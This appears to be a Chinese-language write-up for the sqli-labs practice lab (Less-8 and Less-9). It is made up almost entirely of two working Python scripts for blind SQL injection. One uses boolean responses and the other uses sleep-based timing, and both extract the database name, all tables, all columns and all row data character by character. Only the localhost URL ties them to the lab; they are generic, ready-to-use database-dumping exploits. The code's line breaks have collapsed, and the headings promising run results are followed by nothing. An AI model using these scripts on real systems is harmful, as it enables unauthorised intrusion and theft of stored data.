boolen盲注
import requestsdef boolean_based_injection(url, payload_template):"""布尔盲注的核心函数,通过二分法逐字符推断数据。"""result = ''for i in range(1, 50): # 假设目标字段长度不超过50low, high = 32, 128 # ASCII码范围while low < high:mid = (low + high) // 2response = requests.get(url, params={"id": payload_template.format(i=i, mid=mid)})if "You are in" in response.text:low = mid + 1else:high = midif low == 32: break # 没有有效字符时结束result += chr(low)print(f"Current result: {result}")return resultdef get_database_name(url):"""获取数据库名。"""return boolean_based_injection(url, "1' and ascii(substr(database(), {i}, 1)) > {mid}-- ")def get_all_table_names(url, database_name):"""获取所有表名。"""tables = []for index in range(20): # 假设最多20个表table = boolean_based_injection(url, f"1' and ascii(substr((select table_name from information_schema.tables where table_schema='{database_name}' limit {index},1), {{i}}, 1)) > {{mid}}-- ")if not table: breaktables.append(table)print(f"Found table: {table}")return tablesdef get_all_column_names(url, database_name, table_name):"""获取指定表的所有列名。"""columns = []for index in range(20): # 假设最多20个列column = boolean_based_injection(url, f"1' and ascii(substr((select column_name from information_schema.columns where table_schema='{database_name}' and table_name='{table_name}' limit {index},1), {{i}}, 1)) > {{mid}}-- ")if not column: breakcolumns.append(column)print(f"Found column: {column}")return columnsdef get_all_data(url, database_name, table_name, column_name):"""获取指定列的所有数据。"""data = []for index in range(50): # 假设最多50条数据row = boolean_based_injection(url, f"1' and ascii(substr((select {column_name} from {database_name}.{table_name} limit {index},1), {{i}}, 1)) > {{mid}}-- ")if not row: breakdata.append(row)print(f"Found data: {row}")return dataif __name__ == '__main__':url = 'http://127.0.0.1:81/sqli-labs-master//Less-8/index.php' # Boolean 盲注的测试URL# 获取数据库名db_name = get_database_name(url)print(f"Database name: {db_name}")# 获取所有表名tables = get_all_table_names(url, db_name)print(f"All tables: {tables}")# 获取每个表的所有列名和数据for table in tables:print(f"\nTable: {table}")columns = get_all_column_names(url, db_name, table)print(f"Columns: {columns}")for column in columns:print(f"\nColumn: {column}")data = get_all_data(url, db_name, table, column)print(f"Data: {data}")运行结果(部分):
时间盲注
import time
import requestsdef blind_injection(url, payload_template, max_length=20):"""基于时间盲注的核心函数,通过二分法逐字符推断数据。:param url: 目标URL:param payload_template: SQL注入的payload模板:param max_length: 目标字段的最大长度:return: 推断出的字符串结果"""result = ''for i in range(1, max_length + 1): # 逐字符推断low, high = 32, 128 # ASCII码范围while low < high:mid = (low + high) // 2payload = payload_template.format(i=i, mid=mid)start_time = time.time()requests.get(url, params={"id": payload})end_time = time.time()# 根据响应时间判断字符if end_time - start_time >= 3:low = mid + 1else:high = midif low == 32: # 如果low为32,说明没有有效字符,结束循环breakresult += chr(low)print(f"Current result: {result}")return resultdef get_data(url, query_template, max_items=20, max_length=20):"""通用函数,用于获取数据库名、表名、列名或数据。:param url: 目标URL:param query_template: SQL查询模板:param max_items: 最大项数:param max_length: 每项的最大长度:return: 结果列表"""results = []for index in range(max_items):payload_template = f"1' and if(ascii(substr(({query_template.format(index=index)}), {{i}}, 1)) > {{mid}}, sleep(3), 0)-- "result = blind_injection(url, payload_template, max_length)if not result:breakresults.append(result)print(f"Found item: {result}")return resultsif __name__ == '__main__':url = 'http://127.0.0.1:81/sqli-labs-master/Less-9/index.php' # 目标URL# 获取数据库名database_name = get_data(url, "select database()", max_items=1)[0]print(f"Database name: {database_name}")# 获取所有表名table_names = get_data(url,"select table_name from information_schema.tables where table_schema='{}' limit {{index}},1".format(database_name))print(f"All table names: {table_names}")# 获取每个表的所有列名for table_name in table_names:print(f"\nTable: {table_name}")column_names = get_data(url,"select column_name from information_schema.columns where table_schema='{}' and table_name='{}' limit {{index}},1".format(database_name, table_name))print(f"Columns: {column_names}")# 获取每个列的所有数据for column_name in column_names:print(f"\nColumn: {column_name}")data = get_data(url,"select {} from {}.{} limit {{index}},1".format(column_name, database_name, table_name),max_items=50, max_length=50)print(f"Data: {data}")运行结果(部分):
)
